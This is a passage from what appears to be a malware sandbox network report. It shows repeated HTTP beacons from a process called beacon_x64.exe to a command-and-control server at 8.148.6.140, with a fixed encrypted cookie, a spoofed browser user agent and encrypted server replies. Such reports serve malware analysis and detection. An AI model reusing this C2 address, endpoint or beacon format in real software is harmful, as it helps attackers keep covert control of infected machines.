          Data Ascii: Bqym7iih/u3FoPbpZNB7dpEqlXPvV8vnA0bdFYTqMCYz+Hxl1HEkSpr6NC7K1gllLlLgPKr2P7BJTFzo7csJxaazNGbClXu4e8zQlrBS4QfVFe6zV4kJEABSFWWylGYTuCo6+X2PwJmmwAMXWSKXvY7FBH9/XUtFjp6naGAzE+SWrulOHhRzOq1674RjfFKa


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.6497118.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:00.155724049 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:04.134390116 CET377INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:03 GMT
          Server: nginx
          Content-Length: 192
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 64 31 36 69 4c 5a 44 6b 52 4d 42 56 53 4b 65 37 32 54 50 6d 52 45 34 69 50 71 6f 34 61 2b 4b 44 4d 4e 71 55 69 73 72 4d 4d 48 76 67 47 71 30 64 64 46 44 7a 49 31 70 54 78 58 43 76 39 48 78 4f 74 44 5a 42 47 79 31 52 6a 73 4d 35 72 64 73 35 76 45 35 34 6d 69 79 77 68 66 33 6e 4b 78 35 57 72 65 53 64 61 72 62 53 31 31 35 47 68 72 65 63 59 64 6f 4f 4b 59 59 57 43 41 5a 56 45 6b 34 67 62 6b 31 56 45 56 6f 65 73 4b 46 4e 4c 42 50 6e 65 43 78 6f 56 34 36 76 34 53 4f 43 6f 79 59 55 39 5a 30 72 76 54 54 72 38 53 64 4d 64 50 47 32 64 4a 30 36 4b 51 4d 6d 54 6c 46 37 39 68 7a 6a
          Data Ascii: d16iLZDkRMBVSKe72TPmRE4iPqo4a+KDMNqUisrMMHvgGq0ddFDzI1pTxXCv9HxOtDZBGy1RjsM5rds5vE54miywhf3nKx5WreSdarbS115GhrecYdoOKYYWCAZVEk4gbk1VEVoesKFNLBPneCxoV46v4SOCoyYU9Z0rvTTr8SdMdPG2dJ06KQMmTlF79hzj


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          3192.168.2.6497148.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:04.248008966 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:05.225856066 CET272INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:05 GMT
          Server: nginx
          Content-Length: 88
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 2b 44 6a 73 52 78 58 76 39 52 43 4b 63 4a 42 46 4e 75 75 6b 2b 31 2f 52 53 46 73 4f 43 2f 71 6e 6a 48 2f 68 49 56 44 6e 68 37 6e 71 57 30 66 6e 55 32 41 6a 52 6f 5a 59 58 7a 4b 66 6b 7a 2f 64 41 4a 6c 68 54 77 56 52 5a 78 71 65 49 4a 4c 50 44 63 73 6f 4f 51 3d 3d
          Data Ascii: +DjsRxXv9RCKcJBFNuuk+1/RSFsOC/qnjH/hIVDnh7nqW0fnU2AjRoZYXzKfkz/dAJlhTwVRZxqeIJLPDcsoOQ==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          4192.168.2.6497218.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:05.341588974 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:06.302859068 CET248INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:06 GMT
          Server: nginx
          Content-Length: 64
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 4f 32 68 48 48 63 67 54 78 6f 2b 38 34 56 69 4c 6f 65 39 48 65 30 38 4a 46 35 6e 77 66 32 68 39 2b 6c 53 54 54 7a 74 6f 38 75 4d 66 79 79 6e 56 6c 52 76 70 4f 35 55 46 74 4f 78 36 38 50 76 79
          Data Ascii: O2hHHcgTxo+84ViLoe9He08JF5nwf2h9+lSTTzto8uMfyynVlRvpO5UFtOx68Pvy


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          5192.168.2.6497318.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:06.419847012 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:07.390146971 CET377INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:07 GMT
          Server: nginx
          Content-Length: 192
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 4b 47 6b 6d 49 56 50 44 4f 62 74 58 42 63 4f 30 4a 5a 46 73 46 67 35 45 6d 64 2b 54 6c 56 58 59 33 67 4b 4b 50 65 35 6a 75 4f 62 78 53 55 30 49 43 64 47 35 64 6a 6e 42 34 54 49 37 58 4a 30 47 2b 4d 55 4a 75 79 51 71 52 70 47 58 45 70 4e 42 63 78 53 37 50 57 4c 63 4a 7a 41 37 46 42 4f 63 44 45 4b 6e 76 57 69 5a 42 48 73 72 65 2b 30 51 61 47 30 2f 50 6b 71 4f 6a 62 56 56 57 42 71 4f 74 4c 52 72 55 46 5a 6c 4b 38 5a 76 39 51 6b 41 78 4f 72 4f 75 65 72 4f 57 36 36 58 56 34 49 6b 6a 6e 45 36 76 52 52 70 68 4a 43 74 6c 35 66 4f 5a 4e 76 36 46 72 38 7a 61 7a 41 38 55 69 50 52
          Data Ascii: KGkmIVPDObtXBcO0JZFsFg5Emd+TlVXY3gKKPe5juObxSU0ICdG5djnB4TI7XJ0G+MUJuyQqRpGXEpNBcxS7PWLcJzA7FBOcDEKnvWiZBHsre+0QaG0/PkqOjbVVWBqOtLRrUFZlK8Zv9QkAxOrOuerOW66XV4IkjnE6vRRphJCtl5fOZNv6Fr8zazA8UiPR


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          6192.168.2.6497378.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:07.498735905 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:11.480207920 CET357INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:11 GMT
          Server: nginx
          Content-Length: 172
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 71 46 4d 33 68 2f 62 77 46 76 42 46 76 47 67 35 39 61 30 57 66 54 32 4c 73 4a 47 43 6c 55 78 47 79 67 4d 68 44 59 70 2b 4d 73 47 6b 75 37 6d 64 7a 63 35 57 52 42 77 6f 41 38 6a 74 6b 57 70 52 56 73 43 54 73 35 78 64 46 6f 4d 71 4c 6f 4c 38 48 7a 5a 70 62 74 52 52 4c 63 35 32 2b 66 7a 44 66 71 36 69 58 77 55 63 7a 6b 46 43 33 2f 69 55 7a 61 79 48 49 79 4e 37 45 7a 44 7a 44 36 32 77 44 6c 6f 78 6d 48 52 53 4a 45 67 75 76 61 4b 34 6a 64 59 56 6c 52 5a 55 46 65 71 66 5a 6d 73 6a 32 49 62 56 68 6a 6f 72 33 51 51 3d
          Data Ascii: qFM3h/bwFvBFvGg59a0WfT2LsJGClUxGygMhDYp+MsGku7mdzc5WRBwoA8jtkWpRVsCTs5xdFoMqLoL8HzZpbtRRLc52+fzDfq6iXwUczkFC3/iUzayHIyN7EzDzD62wDloxmHRSJEguvaK4jdYVlRZUFeqfZmsj2IbVhjor3QQ=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          7192.168.2.6497658.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:11.591334105 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:12.575119972 CET184INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:12 GMT
          Server: nginx
          Content-Length: 88
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:25:12.575289011 CET88INData Raw: 34 55 36 7a 44 64 41 36 30 76 52 48 4d 48 34 62 74 72 78 31 39 77 7a 6e 68 58 36 2f 30 75 79 57 71 68 54 35 4f 5a 67 41 76 73 7a 50 76 71 6d 46 34 6d 38 75 63 76 62 4c 78 63 66 58 45 7a 4e 6d 69 53 31 61 47 49 37 4f 34 78 78 79 70 78 43 6a 6b 43
          Data Ascii: 4U6zDdA60vRHMH4btrx19wznhX6/0uyWqhT5OZgAvszPvqmF4m8ucvbLxcfXEzNmiS1aGI7O4xxypxCjkCbFfA==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          8192.168.2.6497788.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:12.685149908 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:13.646812916 CET185INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:13 GMT
          Server: nginx
          Content-Length: 384
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Jan 10, 2025 09:25:13.646960974 CET384INData Raw: 6e 59 54 32 73 4f 4a 59 6b 31 76 59 52 6b 46 4e 6c 69 61 6b 56 63 48 6e 48 35 4e 6f 35 4a 39 59 7a 7a 79 44 79 75 61 64 65 32 6f 78 4b 5a 67 50 53 53 72 72 65 6a 5a 4e 50 64 43 4e 36 53 4a 67 67 6a 46 5a 32 68 70 32 30 7a 7a 33 4b 48 48 77 30 4d
          Data Ascii: nYT2sOJYk1vYRkFNliakVcHnH5No5J9YzzyDyuade2oxKZgPSSrrejZNPdCN6SJggjFZ2hp20zz3KHHw0MFBUgDhdR+YDf8+pWKagelBwk+PEHEJj5n89mTXXdYKtGLQu4dpOBMM/gJYxvVJu3Y9v9FDLBUYY7FSC1fylUOq/MeOxoPVQ2dS7d+ekUwkysNoWHavo7CC+pFLgoeNb8LGmg6HVoXXDPCjYW2pfsFHpZavDLzN3sb


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          9192.168.2.6497868.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:13.763993025 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:14.756736994 CET505INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:14 GMT
          Server: nginx
          Content-Length: 320
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 39 30 75 4e 66 58 76 37 68 6c 5a 6b 77 6f 4c 4f 72 76 33 6e 31 56 38 46 6b 4a 5a 2f 76 66 33 41 66 62 45 42 38 6b 6e 72 6f 43 69 30 4c 57 41 31 4b 4d 2b 43 53 36 39 49 33 75 64 39 41 35 43 38 6e 30 6e 4a 6a 6e 68 73 4e 4f 55 32 37 72 67 49 50 2f 30 78 43 45 4e 37 30 4d 61 43 6b 77 42 39 51 57 36 32 4f 39 62 73 5a 68 65 41 69 67 58 67 44 71 67 4a 31 43 48 61 39 36 65 4f 46 63 52 34 6f 52 49 48 35 47 6d 56 6d 54 65 2f 2f 49 6a 30 2f 36 64 32 54 6e 4e 63 65 78 45 42 6e 36 51 2b 51 5a 42 56 34 53 4e 4a 32 6a 68 79 4a 50 7a 77 68 76 57 2f 69 65 6e 54 45 4d 51 68 78 31 59 35 6e 47 56 52 63 31 71 7a 73 49 6b 4b 78 4f 53 41 35 45 43 2f 65 44 7a 63 44 78 6a 32 30 64 6b 4c 64 6d 4a 2f 59 32 50 78 68 59 35 79 4b 63 45 71 63 7a 30 2f 7a 33 48 61 38 42 52 4c 4b 4a 45 5a 64 63 69 47 31 4f 70 48 38 4d 36 43 38 65 4b 45 79 34 69 75 72 52 4c 6a 36 71 35 6a 77 41 59 59 5a 2b 6f 6f 32 4c 64 36 6b 4c 4c 33 58 33 74 68 62 31 59 6a 6a 4c 58 76 77 50 63 4c 41 56 67 67
          Data Ascii: 90uNfXv7hlZkwoLOrv3n1V8FkJZ/vf3AfbEB8knroCi0LWA1KM+CS69I3ud9A5C8n0nJjnhsNOU27rgIP/0xCEN70MaCkwB9QW62O9bsZheAigXgDqgJ1CHa96eOFcR4oRIH5GmVmTe//Ij0/6d2TnNcexEBn6Q+QZBV4SNJ2jhyJPzwhvW/ienTEMQhx1Y5nGVRc1qzsIkKxOSA5EC/eDzcDxj20dkLdmJ/Y2PxhY5yKcEqcz0/z3Ha8BRLKJEZdciG1OpH8M6C8eKEy4iurRLj6q5jwAYYZ+oo2Ld6kLL3X3thb1YjjLXvwPcLAVgg


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          10192.168.2.6497968.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:14.995476007 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:15.938654900 CET357INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:15 GMT
          Server: nginx
          Content-Length: 172
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 46 33 73 6f 5a 2f 4e 6d 6f 71 53 71 4a 51 63 37 39 6b 6e 77 44 70 5a 33 73 58 4b 62 53 35 78 6b 7a 49 59 33 68 43 62 52 6b 48 78 7a 57 32 4a 63 70 36 4c 6c 44 64 38 57 5a 33 67 68 79 38 76 72 68 35 48 31 63 31 6a 7a 32 62 69 44 71 47 58 39 75 58 31 54 69 4a 4d 39 68 55 6c 34 54 4c 30 42 54 35 64 69 39 39 4a 71 53 4d 6f 6a 35 41 51 48 31 61 69 45 30 74 4a 45 69 42 5a 63 6d 64 5a 75 51 66 51 6a 59 6b 44 58 6a 4b 39 58 36 50 4c 35 64 43 68 33 47 48 52 52 58 6d 2f 2b 4a 35 43 54 42 73 31 73 39 71 59 58 6a 45 38 3d
          Data Ascii: F3soZ/NmoqSqJQc79knwDpZ3sXKbS5xkzIY3hCbRkHxzW2Jcp6LlDd8WZ3ghy8vrh5H1c1jz2biDqGX9uX1TiJM9hUl4TL0BT5di99JqSMoj5AQH1aiE0tJEiBZcmdZuQfQjYkDXjK9X6PL5dCh3GHRRXm/+J5CTBs1s9qYXjE8=


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          11192.168.2.6498038.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:16.060157061 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:20.026225090 CET529INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:19 GMT
          Server: nginx
          Content-Length: 344
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 38 6a 75 45 53 6a 4f 59 6e 67 4c 61 35 69 64 49 50 61 61 5a 5a 34 66 41 42 55 52 31 53 4b 47 74 4b 33 74 56 2f 36 41 4d 34 4a 71 51 4a 63 51 64 34 4f 55 55 2f 6a 50 68 78 4a 64 74 74 58 68 4e 70 38 73 70 79 2f 51 69 4f 48 37 46 47 7a 2b 46 59 62 64 65 46 4d 73 44 5a 33 6e 4c 72 48 44 51 68 4b 75 6f 30 34 69 4e 51 44 6c 73 65 4c 4c 39 31 34 61 75 51 6e 53 59 6b 59 30 65 41 56 37 4e 49 66 45 2f 76 4a 2f 34 4d 44 63 70 6b 71 33 39 32 63 64 31 43 4f 34 4c 77 77 62 6c 53 31 66 4b 45 32 2b 6b 47 6e 2b 58 32 6a 74 76 62 50 76 4d 33 67 61 45 4e 47 33 37 66 49 6d 71 74 6d 31 43 56 56 46 4b 65 2f 47 63 42 31 53 55 39 30 6a 30 41 5a 4b 52 32 74 63 48 43 44 66 62 33 38 53 61 45 66 6d 6e 75 67 48 43 57 74 73 56 76 44 76 4a 43 66 73 63 63 6f 52 39 4c 6e 75 69 51 61 66 64 34 4f 46 59 32 76 44 6f 38 4b 75 7a 65 64 42 5a 44 4e 65 75 54 76 79 4a 79 4c 49 36 6a 4b 42 6a 47 77 75 38 63 32 77 44 65 39 53 37 51 37 55 74 77 37 6d 4b 38 6d 38 52 62 5a 67 5a 70 79 43 34 30 32 76 49 30 78 48 54 74 53 62 30 4d 38 67 37 49 34 [TRUNCATED]
          Data Ascii: 8juESjOYngLa5idIPaaZZ4fABUR1SKGtK3tV/6AM4JqQJcQd4OUU/jPhxJdttXhNp8spy/QiOH7FGz+FYbdeFMsDZ3nLrHDQhKuo04iNQDlseLL914auQnSYkY0eAV7NIfE/vJ/4MDcpkq392cd1CO4LwwblS1fKE2+kGn+X2jtvbPvM3gaENG37fImqtm1CVVFKe/GcB1SU90j0AZKR2tcHCDfb38SaEfmnugHCWtsVvDvJCfsccoR9LnuiQafd4OFY2vDo8KuzedBZDNeuTvyJyLI6jKBjGwu8c2wDe9S7Q7Utw7mK8m8RbZgZpyC402vI0xHTtSb0M8g7I4Mjcw==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          12192.168.2.6498298.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:20.140230894 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          13192.168.2.6498528.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:24.263667107 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:28.246922016 CET272INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:28 GMT
          Server: nginx
          Content-Length: 88
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
          Data Raw: 54 33 45 78 75 68 4c 56 61 58 69 41 6b 57 50 4f 2f 67 2f 70 2f 6f 47 56 34 50 33 74 47 5a 56 56 76 57 30 69 4d 6f 6b 53 2f 52 77 42 2f 48 62 39 50 6c 62 79 4a 6f 6b 52 79 76 30 41 66 49 6a 79 54 52 6d 47 43 46 41 70 54 74 6c 66 59 57 74 67 4d 33 30 53 73 51 3d 3d
          Data Ascii: T3ExuhLVaXiAkWPO/g/p/oGV4P3tGZVVvW0iMokS/RwB/Hb9PlbyJokRyv0AfIjyTRmGCFApTtlfYWtgM30SsQ==


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          14192.168.2.6498768.148.6.140806456C:\Users\user\Desktop\beacon_x64.exe
          TimestampBytes transferredDirectionData
          Jan 10, 2025 09:25:28.376948118 CET544OUTGET /api/v1/get HTTP/1.1
          Content-Type: text/plain
          Accept: */*
          Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
          Accept-Encoding: gzip, deflate
          Priority: u=1, i
          Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc=
          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
          Host: 8.148.6.140
          Connection: Keep-Alive
          Cache-Control: no-cache
          Jan 10, 2025 09:25:29.349307060 CET401INHTTP/1.1 200 OK
          Date: Fri, 10 Jan 2025 08:25:29 GMT
          Server: nginx
          Content-Length: 216
          Connection: keep-alive
          Content-Type: text/plain
          Cache-Control: no-cache
          Pragma: no-cache
